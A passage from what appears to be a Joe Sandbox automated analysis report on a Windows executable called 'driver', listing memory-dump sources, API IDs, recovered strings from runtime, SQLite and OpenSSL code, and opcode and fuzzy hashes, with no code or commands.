                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction ID: 6d07d2a71f6d4b4cc8c80b1c1d7a0f55c5dafa228b64f865ff172a1211eeb096
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB119172EDEA2301F6543126D75637520C46F5DBBCF050634EA6E8A2D7EEECB9417104
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB41F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB43E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB466
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB477
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB488
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                                • Instruction ID: 1d7f2d9e553d8f47129fa4d761a6aaf4f07bbf8e62ae070a2063227739b019d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F118120F8F60249FA589723A5A127961425F64FBCF448335E87DC66D7DEBCF441A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                                • Instruction ID: 32ae4e378718d1dd155a0806f2024c251872120cf07e713f444891ed9415ca24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C112A20E8B2074DF96CA62754612BE21425F56F7CF444734D93ECA6C7DDACB8417202
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction ID: 6c0a7007b30ce88d8657dfd546cd2038640b9ffcd029eb39e61ab9fc3e2a1f47
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F091CF32A4AA4689F7658E26D45077D37A1AB84F9CF444136DA8AC73CBDFBCF405A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                • Instruction ID: 6cae1eda240d8d74012f358bc9fd8d4ff0139abd9d968cc9023134093b84cc96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3381A172E8A2428EF7644E27C11027836A0AF11F8CF958036DA0DD769BDFADF941B741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                • API String ID: 0-3727861699
                                                                                                                                                                                                                                                • Opcode ID: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
                                                                                                                                                                                                                                                • Instruction ID: c78eae72c16a4e53be4f68a80c379e7bedd07f6e245fe2608f425821aa960bfd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75812BA27092C5AAE7108B25C58877E7BA1FB40BC4F085132DF8D87641DF3CE865C7A8
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                                • API String ID: 22509725-3459038510
                                                                                                                                                                                                                                                • Opcode ID: f5dab35276e823905d8a8efc2fbf2e609b3d139e1c4d1f6f4a3d61b1e56e9fbb
                                                                                                                                                                                                                                                • Instruction ID: a4471af778b026b0d85c9ab7766a30e8d5e3ee5657c28d4dc78c000892442a4a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5dab35276e823905d8a8efc2fbf2e609b3d139e1c4d1f6f4a3d61b1e56e9fbb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD612963B4A5819AEB258F28A4442B9B7A2FB44BE8F445335DE5D433D1DF3DD846C304
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C61208
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                                                • API String ID: 3535234312-2527649602
                                                                                                                                                                                                                                                • Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                                • Instruction ID: 3277abee52640f5949743885bad341cd8287e879d61dd7aebbe94107a80d0e66
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8071EB21B0AA82A6FF44EB21D8553FD6690EB84BC4F444035EE1D4B7D6DF7CE4618B28
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F71250
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                                                                                • API String ID: 3434520956-4157686371
                                                                                                                                                                                                                                                • Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                                • Instruction ID: 0f04e23a171d2fb8af4b2398e935e29f681d72651ee02a5cfe1b39e73a4bd37c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F61D061F4EA9265FF209B25D4013B9AB91EF45BC4F484131DD4C4BAD6EF3CE5A08B28
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                • Instruction ID: 715ec2aea275e2c7a29b8bfca51d503d3dfeb064d06ee3f2f22374a1d0862013
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC519F32B5A6028AEB149F16E444A787791FB44F9CF108134DA4E8BB8BDFBDE841D710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                • API String ID: 22509725-3727861699
                                                                                                                                                                                                                                                • Opcode ID: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
                                                                                                                                                                                                                                                • Instruction ID: e3dec1e5643a20686855f4bc2fd63ee3696b020aba7ca629bf612d0790de0b43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8751FDB2709BC095DB10CB19E4886AEBB61F758BC4F19903AEA8E03754DF3CD891C718
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                • Instruction ID: ca0e5d33da3e64865ddb7080a57a05894876cbec074985cacd0516a99a3c4712
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B517E3294928686EB748F26904437876A0FB55F98F144236EA9DC7B97CFBCE850E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                • Instruction ID: 3e645d1c7f53a3bc27edbec73665b6abc29c5937c1d24db6cad482e3f846c8a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B619372909BC585EB608B16E4403AAB7A0FB95F98F044635EB9D87B57DFBCD190CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C6126570
                                                                                                                                                                                                                                                • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                • API String ID: 800424832-87138338
                                                                                                                                                                                                                                                • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                                • Instruction ID: 4afbaeb7b79fdf24e804bcccc229a6dc61f0a3b6e4df06cc0e41a6bebb33b76e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E41D272B0EB4296F7608F38E844A7D6751FB90BE4F544230EA5947AD9EF3CE6019B40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
